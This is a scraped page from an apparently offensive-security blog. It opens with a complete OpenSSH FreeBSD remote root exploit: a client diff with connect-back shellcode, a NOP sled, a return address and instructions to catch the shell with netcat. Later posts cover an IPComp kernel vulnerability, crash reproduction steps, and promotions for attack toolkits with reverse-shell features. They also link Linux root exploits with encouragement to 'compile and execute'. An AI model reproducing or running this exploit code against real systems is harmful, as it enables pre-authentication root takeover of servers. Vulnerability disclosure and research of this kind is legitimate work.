Close Panel

OpenSSH FreeBSD Remote Root Exploit
By Kingcope

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. The statically linked binary can be downloaded from http://isowarez.de/ssh_0day

I know these versions are really old, some seem to run that tough.

-Cheers, King “the archaeologist” Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z \n"
> "setup a netcat, port 443 on yourip first\n\n"
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;

 

1

Jul

2011

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

By IPSECS Admin. Posted in News | No Comments »

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope – 2011

The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the default install.  The sshd banner for 4.11-RELEASE is:
"SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working Remote Exploit which spawns a root shell remotely and previous to authentication was developed.  The bug can be triggered both through ssh version 1 and ssh version 2 using a modified ssh client. During the investigation of the vulnerability it was found that the bug resides in the source code file “auth2-pam-freebsd.c”.

http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit is from 7 years ago.  Specifically the bug follows a code path in the PAM Authentication Thread inside this source code, “pam_thread()”. It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam (ssh version 2) authentications go through this code path.  By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)

The sshd crahes at a place with illegal instructions. It looks like it depends on how the sshd is started. Starting the sshd from the console as root and running the ssh client with long username again reveals:

Read more »

 

from: http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html

BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload
——————————————————————————-

Gruezi, this document describes CVE-2011-1547.

RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so).

An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below.

struct ipcomp {
uint8_t comp_nxt; // Next Header
uint8_t comp_flags; // Reserved
uint16_t comp_cpi; // Compression Parameter Index
};

The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only 1 algorithm is widely implemented, RFC1951 DEFLATE (cpi=2).

It’s well documented that ipcomp can be used to traverse perimeter filtering, however this document discusses potential implementation flaws observed in popular stacks.

The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so:

algo = ipcomp_algorithm_lookup(cpi);

/* … */

error = (*algo->decompress)(m, m->m_next, &newlen);

/* … */

if (nxt != IPPROTO_DONE) {
if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 &&
ipsec4_in_reject(m, NULL)) {
IPSEC_STATINC(IPSEC_STAT_IN_POLVIO);
goto fail;
}
(*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt);
} else
m_freem(m);

/* … */

Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see
http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload.

The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler. This recursive implementation fails to check for stack overflow, and is therefore vulnerable to a remote pre-authentication kernel memory corruption vulnerability.

The NetBSD/KAME network stack is used as basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions).

The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher. The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader.

Read more »

 

People have talked so many things about how to hack the network, but do they remember data communication modeling? do they know how large network hacking scope? or they just know arp spoofing, dns poisoning, and denial of service? To understand complete (nearly?) process network hacking, they have to undestand data communication modeling like DoD (TCP/IP) model or most commonly used OSI model.

By undestanding OSI model concept, knowing all technology related to each OSI layer, and defining each vulnerability which may occurs on each layer they will know how large or how many technology should be assessed on the network or which technology may possesed vulnerability. This presentation try to tell everyone how to understand network hacking from its basic, yeah from OSI model concept. You can read it here!

 

Just like what we promised before, this time we want to release grid toolkit which usable to perform pentest against grid computing infrastructure. It’s almost two years after we release paper related to grid computing [in]security at 2008. The paper contains of:

  • Introduction to grid computing
  • Grid computing scanning and enumeration
  • Exploiting network and transport layer related to grid security
  • Exploiting DNS to stop grid infrastructure trusteeship
  • Exploiting web based – grid computing portal
  • Cracking certificate authority pass phrase
  • Exploiting headnode trusteeship using XML file

Some points mentioned can be exploited using existing network security tool while others are already supported by Grid Toolkit. Grid Toolkit uses python with some additional module which must be installed. The additional python module are:

  • Module goto to support grid toolkit core program
  • Module ClientForm to support grid portal guessing
  • Module Paramiko to support certificate authority cracking

Grid toolkit supports to:

  • Scanning and enumeration grid infrastructure
  • Guessing login gridsphere – web based grid portal
  • Cracking pass phrase of certificate authority private key file
  • Exploiting headnode trusteeship using XML file

More reference about how to install and use this tool will be available soon, so just keep in touch with IPSECS. Finally you can download grid toolkit on gridtoolkit.sourceforge.net or reading python source code on core.ipsecs.com!

 

24

May

2010

IPv6 Hackit – The IPv6 Army Knife

By IPSECS Admin. Posted in Exploitation, News | 1 Comment »

IPv6 is future protocol internet with rich of security features but hackers always do research and try to exploit it. Times by times, days by days, papers and presentations which explains who to defeat this protocol are widely published. Van Hauser of The Hacker Choice (THC) releases his IPv6 attack toolkit to exploit IPv6 protocol weakness. His tools can be freely downloaded on THC website. HD Moore, author Metasploit project wrote paper about Exploiting Tomorrow’s Internet Today: Penetration testing with IPv6 which can be read on http://uninformed.org. His paper tells us about exploiting  IPv6 applications by proxying/relaying via IPv4.

IPSECS, unofficially releases his IPv6 Hackit on sourceforge and papers which nearly complete explains IPv6 exploitation. His papers content of :

  • Introduction to IPv6
  • Connecting to IPv6 Backbone (IPv6-in-IPv4 Tunneling using TSP)
  • An Introduction to IPv6 Socket Programming
  • IPv6 Discovery & Scanning (via ICMP, TCP, DNS)
  • Writing IPv6 Remote Exploit & Shellcoding (Stack Based Buffer Overflow, Format String)
  • IPv6 Protocol Vulnerability (Man In The Middle, Denial of Service)

You can freely download this paper on core.ipsecs.com written in Indonesian. IPSECS wrote IPv6-Hackit using Perl Scripting Language which means that the tools don’t need to be compiled. Somehow, this tool needs some perl module to be installed:

  • strict
  • warnings
  • Switch
  • English
  • Net::DNS
  • POSIX
  • Getopt::Long
  • LWP::UserAgent
  • HTTP::Message
  • IO::Socket::INET6

This tool supports to do:

  • Hosts Enumeration finding which host is up/down.
  • TCP Port scanning to find which port is open/close.
  • Googling via unix shell to find possible IPv6 domains.
  • Finding AAAA IPv6 host record from single or massive collected domains.
  • Getting shell from IPv6 binding shellcode/payload.
  • Getting shell from IPv6 reverse shellcode/payload.
  • Exploiting simple IPv6 application weakness (currently this module is still developed)
  • IPv6 Binding backdoor with authentication (currently this module is still developed)

You can easily download this IPv6 Hackit on ipv6hackit.sourceforge.net. Meanwhile you play this tools and read the paper, now we develope grid-toolkit to be released soon. So just follow and watch this website, IPSECS just gives best stuff to play with! Finally enjoy guys!

 

Can you imagine our indonesian internet core routing to be shutted down? None can browse their email, open facebook, or just search through google. Can you imagine indonesian internet banking stopped working for a while? Automatic Teller Machine (ATM) won’t work to response your request? That’s all just the lowest risk when core routing to be compromised.

Can you imagine when your confidential data to be sniffed without none notice it? Can you imagine when your username and password to be stealed? Oh that’s not big deal huh? But try to imagine your banking transaction to be intercepted and modified, yeah that’s the real fear on digital world. Hell yeah, this paper explains you how that problems are possible. This paper try to tell you how weak our indonesian core routing infrastructure, check it out!

 

3

Dec

2009

Another FreeBSD Root Exploit Leaked!

By IPSECS Admin. Posted in Exploitation | No Comments »

The latest version of freebsd is found to be vulnerable. This vulnerability is found in run time link editor (rtld) which can be tricked to accept LD variables even on setugid binaries. You might see this flaw by analyzing this exploit.

With this leaked exploit, it’s more than 10 exploitable vulnerability leaked to public this year (2009)! So it’s that true if freebsd as secure as what people said?!

 

2

Sep

2009

All Linux Kernel Are Targeted

By IPSECS Admin. Posted in Exploitation | No Comments »

Yupe, that’s true when sock_sendpage() is discovered to be vulnerable by Tavis Ormandy and Julien Tinnes. The function is vulnerable to NULL pointer dereference that can be exploited to escalate priviledge to be root. Most of linux kernel are reported to be vulnerable. Exploit to take advantage of this flaw has been developed and spreaded freely on internet. The exploit can be used to bypass security restriction like SElinux.

http://milw0rm.com/exploits/9435 – the first written exploit by spender of gresecurity
http://milw0rm.com/exploits/9436 – another exploit taken from www.frasunek.com
http://milw0rm.com/exploits/9479 – another exploit from p0c73n1
http://milw0rm.com/exploits/9545 – another exploit written by Ramon de Carvalho Valle of risesecurity

Download the exploit, compile and execute! BOOMMM It’s root! Finally, this post is a little bit late :D .

 

22

Jul

2009

PulseAudio Owns My Ubuntu Intrepid

By IPSECS Admin. Posted in Exploitation | No Comments »

It just fun to try exploiting pulseaudio to gain root priviledge, well my Ubuntu Intrepid is indeed exploitable.

Searching more about linux, i find an exploit to attack RHEL family with SELinux enabled here. So, is that true linux more secure than windows?? The fact which makes linux more secure is the people behind the machine. So many linux administrators is much more skilled than windows ones.

 

9

Jun

2009

Distributed Password Cracking

By IPSECS Admin. Posted in Exploitation, Presentation | No Comments »

Password cracking which uses some computers to accelerate password cracking process. It usually uses computer clusters and some software to support parallel computing. Some known software to do parallel computing in cluster computers are:

  • John The Ripper and Condor, John works as password cracker while Condor works as scheduler which parallelizes cracking proccess and distributes it to clusters.
  • John The Ripper and Djohn, John works as password cracker while Djohn works as client-servers application which parallelizes cracking proccess and distributes it to clusters.
  • Medussa, password cracker which’s originally designed to do parallel password cracking. It contains client servers application to parallelize cracking proccess and distribute it to clusters.
  • John The Ripper with MPI patch, john which’s developed using MPI programming. MPI is standard de facto for parallel programming which’s implemented on some softwares i.e : OpenMPI, MPICH, and LAM/MPI.

Our presentation describes how to do parallel cracking using John The Ripper with MPI patch. We use 15 dual core computers and LAM/MPI in distributing cracking proccess. Download our presentation here.

 

3

Jun

2009

Global Trend Attack

By IPSECS Admin. Posted in Exploitation, Presentation | No Comments »

The complete title is “global trend attack in local network“, this is my presentation in Telkom RDC Bandung at last 2007. It’s old but still nice enough to know what threats may disturb your network. Download my presentation here.

This presentation explains top 6 flaws which’s commonly exploited in Local Network. They are:

  • Spoofing; ARP Spoofing, IP Spoofing, DHCP Spoofing, DNS Spoofing are commonly exploited.
  • Man In The Middle; Using some spoofing techniques to do Man In The Middle attack.
  • Sniffing; Combining Man in The Middle with some tricks to passively intercept communication in Local Network.
  • TCP/IP Hijacking; Doing active sniffing and modificating data traffic to take over active TCP/IP connection.
  • Remote Code Execution; Using some software application flaws to exploit local network infrastructure. Buffer Overflow and Format String are the most common flaws to be exploited in Local Network.
  • Denial of Service; Most powerful denial of service (DoS) comes from Local Network.

This presentation is completed with ways to defend this attacks and minimize security risks.

 

17

May

2009

Grid Computing Hacking

By IPSECS Admin. Posted in Exploitation, News | No Comments »

Introduction

Grid computing is kind of new technology which has been known since 1990s. It idea was brought together by Ian Foster, Carl Kesselman, and Steve Tuecke, widely regardes as “Father of Grid”. Grid computing is defined as group of node computation which works together in distributed computing. You can find some grid project in wikipedia article here.

Each node in grid has computer cluster to perform high performance computing through parallel computation. A computer cluster consists of a headnode (master) and some computational nodes (slaves). Headnode is responsible in communicating with the other headnode in grid, managing computation resource, and scheduling computation jobs to slave. We don’t want to explain detail how computer cluster works. In this article, our interest is in grid computing and why it’s vulnerable to some hacking exploitation.

How Grid Works

Grid computing is really complex inside its technology, so the chance of being exploited is really big. Grid computing needs a good network connectivity, many TCP/IP services, encryption, parallel programming, and web service. A headnode of cluster trusts the other because valid Certificate Authority (CA) is installed on both of headnode. CA which installed on headnode is called as Host CA. TCP/IP services is needed in headnode to send or receive data or execute jobs between two or more headnodes. There is two services in headnode which need to communicate a headnode to other, 1st is GridFTP service which is responsible in data transfer between two or more headnodes and 2nd is Web Service Container which is responsible in receiving jobs from user. Both services can be activated by installing Globus Toolkit which is de facto standard open source software for grid.

Read more »

 

15

May

2009

Is This End of Linux Kernel?

By IPSECS Admin. Posted in News | No Comments »

I just look arround on milw0rm today and searching for linux kernel exploit, luckily i find four new linux kernel exploits.

linux

    • First exploit is to attack linux kernel locally using exit_notify() function vulnerability. This flaw affects linux kernel less than 2.6.29 (most of linux kernel). Just take a look here for the proof of concept.
      • Second exploit is to attack linux kernel locally using UDEV vulnerability. Udev less than 1.4.1 is reported that it doesn’t verify wheter a NETLINK message originates from kernel space, which allows local users to gain root priviledge by sending a NETLINK message from user space. Let take a look here and here for the proof of concept.
        • Third exploit is to attack linux kernel remotely using SCTP FWD memory corruption. Some people say this bug isn’t exploitable untill sgrakkyu gives his explanation. Sgrakkyu explanation can be read here, take a look here for the proof of concept. This flaw affects most of linux kernel.
          • Fourth exploit is to attack linux kernel locally using ptrace_attach() function vulnerability. This flaw affects linux kernel version 2.6.29. Just take a look here and here for the proof of concept.

            Now i just think, which is more secure by default “linux or windows??“, even openbsd which’s claimed as the most secured operating system has a stupid bugs inside its code.

             

            Introduction

            802.1x is an IEEE standard for port-based (well, we would rather say interface-based) enduser authentication on LANs. While it supports (and was initially designed for) Ethernet, the main current use of 802.1x is wireless users’ authentication as a part of the wireless security scheme provided by the 802.11i security standard. The 802.1x authentication chain consists of three elements:

            • Supplicant An end-user station, often a laptop, that runs 802.1x client software.
            • Authenticator A switch, a wireless gateway, or an access point to which the authenticating users connect. It must be configured to support 802.1x on the involved interfaces with commands like aaa authentication dot1x default group radius (global configuration) and dot1x port control auto (switch interface).
            • Authentication server A RADIUS server to which authenticators forward end users’ authentication requests for verification and authentication decision.

            Cisco Switch

            EAP-LEAP Basics

            The Extensible Authentication Protocol (EAP) is used by all three 802.1x component devices to communicate with each other. It is extensible since many different EAP types exist for all kinds of authentication plans—for example, employing SIM cards, tokens, certificates, and more traditional passwords. Here we are interested only in Cisco-related protocols and products, thus the security weaknesses of EAP-LEAP are the target of the discussion.

            Read more »